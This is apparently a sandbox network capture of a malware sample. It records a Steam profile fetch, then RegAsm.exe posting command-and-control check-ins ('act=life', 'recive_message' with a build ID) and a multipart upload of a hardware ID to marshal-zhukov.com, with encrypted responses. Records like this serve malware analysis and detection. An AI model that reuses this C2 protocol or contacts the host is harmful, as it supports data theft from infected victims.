                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                        Cache-Control: no-cache
                                                                                        Date: Thu, 14 Nov 2024 07:08:23 GMT
                                                                                        Content-Length: 35964
                                                                                        Connection: close
                                                                                        Set-Cookie: sessionid=543a790b33e49755b481c0a6; Path=/; Secure; SameSite=None
                                                                                        Set-Cookie: steamCountry=US%7C129b19db70bc2b7ff2901c827e2c9472; Path=/; Secure; HttpOnly; SameSite=None
                                                                                        2024-11-14 07:08:23 UTC14467INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                        2024-11-14 07:08:23 UTC16384INData Raw: 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e
                                                                                        Data Ascii: <a class="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="submen
                                                                                        2024-11-14 07:08:23 UTC3768INData Raw: 70 6c 61 79 65 72 41 76 61 74 61 72 20 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 69 7a 65 20 6f 66 66 6c 69 6e 65 22 20 64 61 74 61 2d 6d 69 6e 69 70 72 6f 66 69 6c 65 3d 22 31 37 36 34 30 36 36 31 37 32 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 79 65 72 41 76 61 74 61 72 41 75 74 6f 53 69 7a 65 49 6e 6e 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 66 65 66 34 39 65 37 66 61 37 65 31 39 39 37 33 31 30 64 37 30 35 62 32 61 36 31 35 38 66 66 38 64 63 31 63 64 66 65 62 5f 66 75 6c 6c 2e 6a 70 67 22 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d
                                                                                        Data Ascii: playerAvatar profile_header_size offline" data-miniprofile="1764066172"><div class="playerAvatarAutoSizeInner"><img src="https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg"></div>
                                                                                        2024-11-14 07:08:23 UTC1345INData Raw: 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 69 6d 61 67 65 73 2f 73 6b 69 6e 5f 31 2f 66 6f 6f 74 65 72 4c 6f 67 6f 5f 76 61 6c 76 65 2e 70 6e 67 3f 76 3d 31 22 20 77 69 64 74 68 3d 22 39 36 22 20 68 65 69 67 68 74 3d 22 32 36 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 56 61 6c 76 65 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 54 65 78 74 22 3e 0d 0a 09 09 09 09 09 26 63 6f 70 79 3b 20 56 61 6c 76 65 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 41 6c 6c 20 74 72 61 64 65 6d 61 72 6b 73 20 61 72 65 20 70 72 6f 70 65 72 74 79 20 6f 66 20 74 68 65 69 72 20 72 65 73 70 65 63 74 69 76 65 20 6f 77 6e
                                                                                        Data Ascii: teamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1" width="96" height="26" border="0" alt="Valve Logo" /></span><span id="footerText">&copy; Valve Corporation. All rights reserved. All trademarks are property of their respective own


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.549707188.114.96.34436484C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-14 07:08:24 UTC265OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 8
                                                                                        Host: marshal-zhukov.com
                                                                                        2024-11-14 07:08:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                        Data Ascii: act=life
                                                                                        2024-11-14 07:08:25 UTC1009INHTTP/1.1 200 OK
                                                                                        Date: Thu, 14 Nov 2024 07:08:25 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=ejq6s9dfa5v6c8mhch8pvk87ir; expires=Mon, 10-Mar-2025 00:55:04 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zMnxcRwL2LB6auwrDPWixRjPb3A7DYUoWXeMDEoJyvoSWQ9OIg9m9QkzNs1kbFCrJkhiGZB8oURiKM0s%2FnuPo1WBxlwIswJ9hgsRvu4KNP85qPC3sBybsJhk08eqlZ1x1cmYFNY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e252b8f380b3462-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1168&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=909&delivery_rate=2271372&cwnd=248&unsent_bytes=0&cid=3ab758244beee8cf&ts=513&x=0"
                                                                                        2024-11-14 07:08:25 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                        Data Ascii: 2ok
                                                                                        2024-11-14 07:08:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.549708188.114.96.34436484C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-14 07:08:26 UTC266OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 52
                                                                                        Host: marshal-zhukov.com
                                                                                        2024-11-14 07:08:26 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 26 6a 3d
                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--6928154717&j=
                                                                                        2024-11-14 07:08:26 UTC1017INHTTP/1.1 200 OK
                                                                                        Date: Thu, 14 Nov 2024 07:08:26 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=830uji9q4etdkkh0kheqd67plb; expires=Mon, 10-Mar-2025 00:55:05 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a5W6%2BKcaw2z3YIBpVJ4P2gM5RyoSwBcMH4SLfIrRGQaArvVu0aCDxyEPNp7OF7TiU0L8%2BLdlrYLKtV4uIri4mJ%2BFCaXsEZ72NisIN3z1lkxrrItFTQVRvd1%2Bg3qnKYSx06r%2BKtk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e252b980ced2e7e-DFW
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1369&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=954&delivery_rate=2080459&cwnd=249&unsent_bytes=0&cid=52416479a33a677e&ts=517&x=0"
                                                                                        2024-11-14 07:08:26 UTC352INData Raw: 34 64 36 0d 0a 77 30 38 75 34 65 45 79 6c 4e 77 34 35 58 37 59 37 45 6f 6c 47 4d 31 68 6d 59 6c 6c 37 34 47 31 2f 4c 62 70 68 72 31 4b 48 67 69 34 62 56 6a 44 32 77 61 34 2f 6b 75 41 58 4f 4b 59 4f 46 42 39 34 55 50 34 37 55 66 56 35 39 53 51 78 59 79 71 6e 7a 78 7a 4b 76 6b 70 54 34 32 53 56 37 6a 2b 58 5a 31 63 34 72 63 78 42 33 32 6a 51 36 4f 72 41 49 58 6a 31 4a 44 55 69 4f 33 53 4f 6e 4a 72 71 79 4e 4a 69 59 52 52 38 4c 31 55 69 42 75 39 69 53 74 50 64 71 51 4d 38 65 52 48 77 36 50 51 68 70 54 54 70 50 41 76 61 6d 6d 4f 4c 6c 32 4b 77 30 2b 34 70 78 71 41 45 50 72 57 61 45 52 39 72 77 33 2f 37 51 36 48 36 64 32 59 31 59 33 73 7a 53 4e 34 59 4b 73 74 53 6f 69 4f 57 4f 53 77 58 6f 38 51 75 34 4d 72 42 7a 54 76 42 4f 4f 72 58 38 32 77 35 5a 33 46 6d 76
                                                                                        Data Ascii: 4d6w08u4eEylNw45X7Y7EolGM1hmYll74G1/Lbphr1KHgi4bVjD2wa4/kuAXOKYOFB94UP47UfV59SQxYyqnzxzKvkpT42SV7j+XZ1c4rcxB32jQ6OrAIXj1JDUiO3SOnJrqyNJiYRR8L1UiBu9iStPdqQM8eRHw6PQhpTTpPAvammOLl2Kw0+4pxqAEPrWaER9rw3/7Q6H6d2Y1Y3szSN4YKstSoiOWOSwXo8Qu4MrBzTvBOOrX82w5Z3Fmv
                                                                                        2024-11-14 07:08:26 UTC893INData Raw: 43 58 66 61 73 55 6f 77 58 76 35 77 6a 54 6e 65 69 41 2f 62 68 43 49 37 6a 30 4a 54 65 68 4f 37 62 4a 58 46 73 6f 53 30 4d 7a 63 4e 58 37 76 34 43 78 7a 2b 2f 6e 69 39 4c 62 4f 30 35 75 2f 52 4a 6c 4b 50 51 6b 70 54 54 70 4e 63 74 66 32 6d 71 49 6b 2b 4c 69 45 4c 32 72 46 79 4b 47 61 69 49 4c 55 6c 77 72 42 48 78 35 51 47 4f 36 74 79 58 30 59 7a 67 6e 32 59 38 62 62 6c 74 46 4d 4f 69 58 66 32 79 55 4a 41 63 2b 70 46 6d 58 6a 71 6f 44 37 75 7a 52 34 6e 69 30 35 2f 51 68 65 72 62 4a 48 70 6b 72 43 4a 4b 69 59 4e 58 2f 4c 5a 53 68 68 47 78 67 53 68 43 64 36 73 46 39 2b 6f 43 7a 61 32 58 6d 63 7a 4c 76 4a 38 47 65 32 6d 7a 62 33 6d 41 6a 56 37 78 71 42 71 59 55 71 50 4f 4c 30 73 36 39 30 50 31 37 67 69 66 34 73 57 62 32 70 6e 6f 32 69 35 78 61 61 38 74 53 59
                                                                                        Data Ascii: CXfasUowXv5wjTneiA/bhCI7j0JTehO7bJXFsoS0MzcNX7v4Cxz+/ni9LbO05u/RJlKPQkpTTpNctf2mqIk+LiEL2rFyKGaiILUlwrBHx5QGO6tyX0Yzgn2Y8bbltFMOiXf2yUJAc+pFmXjqoD7uzR4ni05/QherbJHpkrCJKiYNX/LZShhGxgShCd6sF9+oCza2XmczLvJ8Ge2mzb3mAjV7xqBqYUqPOL0s690P17gif4sWb2pno2i5xaa8tSY
                                                                                        2024-11-14 07:08:26 UTC1369INData Raw: 33 66 39 36 0d 0a 77 6e 54 34 65 48 58 66 6d 33 55 34 34 4f 73 49 49 6d 56 58 65 6c 42 76 58 6e 41 6f 4c 6a 31 70 2f 61 67 65 2b 66 5a 6a 78 74 75 57 30 55 77 36 78 64 35 71 78 51 6a 41 33 34 75 79 74 4a 64 4b 67 56 75 2f 52 4a 6c 4b 50 51 6b 70 54 54 70 4e 51 75 63 47 61 68 4b 31 36 4e 6a 45 4c 38 72 46 36 4a 47 4c 61 41 49 55 70 31 71 68 48 2f 36 78 57 4d 35 74 43 51 32 5a 6e 68 6e 32 59 38 62 62 6c 74 46 4d 4f 35 5a 50 47 75 53 34 42 65 6a 34 30 6d 53 58 32 35 51 2b 53 6c 48 73 33 6b 32 39 36 4d 79 2b 66 54 4a 58 56 76 72 6a 39 47 6a 34 4a 43 38 62 64 54 6a 52 32 30 67 53 4e 4c 66 37 30 49 39 4f 4d 49 6a 4f 37 61 6c 64 43 4c 70 4a 46 6f 65 33 4c 68 64 51 79 69 6a 6c 2f 6b 76 55 76 46 4b 62 6d 41 4a 6b 42 73 37 78 79 31 38 6b 65 4b 37 35 66 47 6c 49 72
                                                                                        Data Ascii: 3f96wnT4eHXfm3U44OsIImVXelBvXnAoLj1p/age+fZjxtuW0Uw6xd5qxQjA34uytJdKgVu/RJlKPQkpTTpNQucGahK16NjEL8rF6JGLaAIUp1qhH/6xWM5tCQ2Znhn2Y8bbltFMO5ZPGuS4Bej40mSX25Q+SlHs3k296My+fTJXVvrj9Gj4JC8bdTjR20gSNLf70I9OMIjO7aldCLpJFoe3LhdQyijl/kvUvFKbmAJkBs7xy18keK75fGlIr
                                                                                        2024-11-14 07:08:26 UTC1369INData Raw: 47 53 74 4a 6b 75 49 69 46 54 79 76 6c 65 4d 45 72 53 48 4a 45 39 32 71 42 48 32 37 67 2b 48 36 74 4b 53 32 59 6a 32 33 43 6b 38 4a 4f 45 71 56 4d 50 62 45 4e 47 4e 62 61 52 63 70 63 41 78 42 33 32 6a 51 36 4f 72 42 6f 58 6b 32 5a 72 47 68 66 62 52 4c 33 78 73 71 53 56 4c 6a 34 31 65 35 4c 5a 62 68 78 4b 31 68 69 46 44 65 36 73 48 39 2b 78 48 77 36 50 51 68 70 54 54 70 50 63 72 5a 6e 44 6a 41 30 65 44 68 45 44 67 70 52 71 59 55 71 50 4f 4c 30 73 36 39 30 50 2f 34 41 32 45 34 4e 36 61 32 59 76 74 30 43 46 30 5a 36 6b 2f 54 59 6d 52 56 50 4f 2f 56 59 30 59 73 6f 49 6e 53 33 36 39 43 4c 75 6c 52 34 72 37 6c 38 61 55 71 2b 2f 4a 43 32 35 34 34 54 49 43 6d 73 4e 58 2b 76 34 43 78 78 57 32 6a 79 6c 4e 66 4b 51 47 39 75 73 43 68 2b 54 62 6e 74 53 49 34 74 6b 6c
                                                                                        Data Ascii: GStJkuIiFTyvleMErSHJE92qBH27g+H6tKS2Yj23Ck8JOEqVMPbENGNbaRcpcAxB32jQ6OrBoXk2ZrGhfbRL3xsqSVLj41e5LZbhxK1hiFDe6sH9+xHw6PQhpTTpPcrZnDjA0eDhEDgpRqYUqPOL0s690P/4A2E4N6a2Yvt0CF0Z6k/TYmRVPO/VY0YsoInS369CLulR4r7l8aUq+/JC2544TICmsNX+v4CxxW2jylNfKQG9usCh+TbntSI4tkl
                                                                                        2024-11-14 07:08:26 UTC1369INData Raw: 52 45 67 34 78 56 2f 72 56 63 69 52 32 38 67 69 55 48 4e 4f 38 45 34 36 74 66 7a 63 54 4e 6b 39 4b 63 39 65 6f 76 66 44 76 68 4d 67 4b 61 77 31 66 36 2f 67 4c 48 45 62 61 45 4a 55 4a 2b 70 77 54 34 36 67 75 4a 37 74 71 61 33 59 2f 68 7a 54 70 36 5a 4b 45 69 51 6f 79 50 51 76 69 37 57 6f 74 63 39 4d 34 76 58 7a 72 33 51 38 72 38 42 38 33 38 6d 59 65 55 6a 4f 69 66 63 44 78 6c 72 44 39 41 6a 49 4e 52 39 62 70 52 67 42 71 38 6a 79 74 43 65 61 6f 46 2b 75 73 4c 68 2b 54 66 6c 4e 71 47 34 74 73 75 65 69 72 76 62 55 75 62 77 77 69 32 6a 46 65 4a 46 62 6d 49 4a 56 46 53 6e 6b 50 6b 70 52 37 4e 35 4e 76 65 6a 4d 76 67 31 43 42 77 62 36 6b 6f 54 59 75 4a 57 50 6d 78 53 49 59 54 73 34 6b 6a 53 6e 57 68 42 76 58 35 41 49 62 6f 33 35 66 61 6a 61 53 52 61 48 74 79 34
                                                                                        Data Ascii: REg4xV/rVciR28giUHNO8E46tfzcTNk9Kc9eovfDvhMgKaw1f6/gLHEbaEJUJ+pwT46guJ7tqa3Y/hzTp6ZKEiQoyPQvi7Wotc9M4vXzr3Q8r8B838mYeUjOifcDxlrD9AjINR9bpRgBq8jytCeaoF+usLh+TflNqG4tsueirvbUubwwi2jFeJFbmIJVFSnkPkpR7N5NvejMvg1CBwb6koTYuJWPmxSIYTs4kjSnWhBvX5AIbo35fajaSRaHty4
                                                                                        2024-11-14 07:08:26 UTC1369INData Raw: 44 57 2f 36 35 55 6f 4d 53 71 49 38 6e 42 7a 54 76 42 4f 4f 72 58 38 33 53 77 5a 6e 54 68 4b 62 32 4c 32 64 72 71 79 35 48 6a 38 4e 50 75 4b 63 61 67 42 44 36 31 6d 68 4b 64 71 49 48 36 65 63 48 6a 65 72 51 6c 4d 61 45 36 39 49 72 66 47 2b 7a 4c 46 36 4d 69 46 58 31 75 6c 57 49 45 4c 4b 45 61 41 6b 36 71 42 75 37 73 30 65 68 34 4d 61 55 6c 71 7a 2b 79 53 39 77 65 36 6f 67 51 4d 4f 63 48 75 2f 2b 58 59 74 63 34 73 34 6f 52 6e 65 39 42 76 72 68 44 59 44 72 32 4a 76 52 68 4f 44 62 49 33 4a 34 72 79 4a 4d 68 59 68 52 38 37 31 52 6a 52 4b 7a 6e 47 67 4a 4f 71 67 62 75 37 4e 48 70 2f 6a 57 6b 39 6a 4a 79 74 51 2b 65 79 69 41 49 30 65 45 6a 30 61 32 6f 52 53 65 58 4c 32 43 61 42 38 36 70 67 33 33 36 41 43 46 36 39 4b 65 33 34 76 72 31 53 5a 37 65 4b 73 68 52 70
                                                                                        Data Ascii: DW/65UoMSqI8nBzTvBOOrX83SwZnThKb2L2drqy5Hj8NPuKcagBD61mhKdqIH6ecHjerQlMaE69IrfG+zLF6MiFX1ulWIELKEaAk6qBu7s0eh4MaUlqz+yS9we6ogQMOcHu/+XYtc4s4oRne9BvrhDYDr2JvRhODbI3J4ryJMhYhR871RjRKznGgJOqgbu7NHp/jWk9jJytQ+eyiAI0eEj0a2oRSeXL2CaB86pg336ACF69Ke34vr1SZ7eKshRp
                                                                                        2024-11-14 07:08:26 UTC1369INData Raw: 72 68 71 59 55 71 50 4f 4c 30 73 36 39 30 50 37 37 77 75 4f 35 4e 6d 52 32 59 54 6a 31 43 64 32 5a 4c 4d 69 53 59 75 50 57 50 75 73 55 49 30 4f 73 34 63 6c 53 58 4b 39 41 4c 75 6c 52 34 72 37 6c 38 61 55 75 65 37 63 4a 47 70 6e 72 6d 31 54 7a 5a 6f 51 38 62 49 61 33 31 79 6f 6e 43 68 4d 65 71 67 4e 36 65 6f 50 67 75 6e 58 6d 4e 2b 42 35 39 59 73 63 6d 4f 6e 4c 45 47 43 67 6c 44 7a 76 6c 4f 56 45 66 72 41 61 45 42 69 37 31 75 37 33 41 75 47 30 74 53 49 6c 4a 53 71 78 6d 68 37 5a 75 46 31 44 49 4b 52 58 66 36 36 57 6f 6f 61 73 59 38 70 52 48 71 76 41 50 76 75 44 49 4c 6c 30 4a 50 65 67 75 33 4e 49 48 68 34 6f 53 46 49 77 38 30 51 38 61 59 61 33 31 79 4b 6a 53 4e 4c 65 71 49 57 75 2f 52 4a 6c 4b 50 51 6b 70 54 54 70 4e 63 6a 64 32 79 71 4c 6b 2b 4e 69 46 72
                                                                                        Data Ascii: rhqYUqPOL0s690P77wuO5NmR2YTj1Cd2ZLMiSYuPWPusUI0Os4clSXK9ALulR4r7l8aUue7cJGpnrm1TzZoQ8bIa31yonChMeqgN6eoPgunXmN+B59YscmOnLEGCglDzvlOVEfrAaEBi71u73AuG0tSIlJSqxmh7ZuF1DIKRXf66WooasY8pRHqvAPvuDILl0JPegu3NIHh4oSFIw80Q8aYa31yKjSNLeqIWu/RJlKPQkpTTpNcjd2yqLk+NiFr
                                                                                        2024-11-14 07:08:26 UTC1369INData Raw: 6a 79 78 6d 43 6c 4b 63 61 4e 42 2b 75 59 58 69 71 4f 5a 33 74 4c 4c 76 49 39 6d 50 47 36 77 62 52 54 54 30 51 75 6a 37 51 33 58 54 71 58 41 4d 51 64 73 37 31 75 70 70 55 65 66 6f 34 2f 65 6b 34 6a 32 7a 53 35 2f 66 4b 4a 71 63 72 32 6a 57 2f 71 39 56 6f 59 62 2b 73 42 6f 53 44 72 33 4f 72 76 6f 46 5a 2b 73 78 6f 6a 5a 6d 2b 4f 54 49 47 31 6e 72 57 30 43 77 38 39 55 2f 62 4a 66 67 41 7a 31 6e 44 68 4d 64 72 6c 50 2f 2f 6c 48 77 36 50 47 6c 64 75 5a 36 74 68 6e 62 58 79 73 50 55 2b 47 68 42 7a 2b 72 31 65 4c 58 50 54 4f 50 55 78 32 71 51 37 75 70 42 61 62 34 4d 47 5a 6d 49 50 31 30 69 51 38 56 65 39 74 56 4d 50 62 45 4d 4f 39 56 49 6b 62 72 4a 39 6c 5a 33 47 6a 41 50 66 71 41 4d 32 74 6c 35 69 55 30 37 65 52 61 48 68 37 34 58 55 63 30 64 67 46 70 65 6b 4b
                                                                                        Data Ascii: jyxmClKcaNB+uYXiqOZ3tLLvI9mPG6wbRTT0Quj7Q3XTqXAMQds71uppUefo4/ek4j2zS5/fKJqcr2jW/q9VoYb+sBoSDr3OrvoFZ+sxojZm+OTIG1nrW0Cw89U/bJfgAz1nDhMdrlP//lHw6PGlduZ6thnbXysPU+GhBz+r1eLXPTOPUx2qQ7upBab4MGZmIP10iQ8Ve9tVMPbEMO9VIkbrJ9lZ3GjAPfqAM2tl5iU07eRaHh74XUc0dgFpekK
                                                                                        2024-11-14 07:08:26 UTC1369INData Raw: 41 78 42 32 7a 76 57 36 69 6c 52 35 2b 6a 6a 39 36 54 68 65 6e 65 4b 33 4a 70 73 7a 39 4b 67 4a 56 54 73 59 42 6b 6f 68 47 33 69 79 5a 41 52 4a 45 69 38 66 73 4b 67 75 54 70 6f 4f 4f 61 34 38 39 71 57 6d 6d 33 4c 67 7a 4e 77 30 69 32 35 68 71 6d 46 71 71 44 4a 30 41 36 34 55 50 2f 71 31 2f 4e 78 74 71 54 30 59 58 6a 6e 51 6c 32 65 71 77 69 53 38 50 4e 45 50 72 2b 41 73 63 64 73 4a 34 6c 53 48 33 6a 42 4f 48 73 52 38 4f 6a 32 64 36 4d 79 2b 58 56 4f 48 46 6c 70 6d 46 4b 6a 59 30 51 36 66 42 44 78 77 72 36 31 6e 73 4a 4f 72 31 44 6f 36 74 41 67 2b 37 57 6e 64 71 49 39 73 30 75 66 33 79 69 61 6e 4b 39 70 6c 33 37 75 31 53 41 49 6f 53 76 49 6c 64 33 6f 41 53 35 79 77 43 62 34 4f 6d 67 34 35 72 6a 7a 32 70 61 61 62 63 75 44 4d 33 44 53 4c 62 6d 47 71 59 57 71
                                                                                        Data Ascii: AxB2zvW6ilR5+jj96TheneK3Jpsz9KgJVTsYBkohG3iyZARJEi8fsKguTpoOOa489qWmm3LgzNw0i25hqmFqqDJ0A64UP/q1/NxtqT0YXjnQl2eqwiS8PNEPr+AscdsJ4lSH3jBOHsR8Oj2d6My+XVOHFlpmFKjY0Q6fBDxwr61nsJOr1Do6tAg+7WndqI9s0uf3yianK9pl37u1SAIoSvIld3oAS5ywCb4Omg45rjz2paabcuDM3DSLbmGqYWq


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.549709188.114.96.34436484C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-14 07:08:27 UTC276OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: multipart/form-data; boundary=XQBYBEG863
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 12792
                                                                                        Host: marshal-zhukov.com
                                                                                        2024-11-14 07:08:27 UTC12792OUTData Raw: 2d 2d 58 51 42 59 42 45 47 38 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 42 31 45 46 39 39 32 42 31 45 34 33 38 46 43 45 43 35 45 37 39 45 33 34 45 30 34 37 41 39 0d 0a 2d 2d 58 51 42 59 42 45 47 38 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 51 42 59 42 45 47 38 36 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 58 51 42 59 42 45 47 38 36 33 0d 0a 43 6f 6e
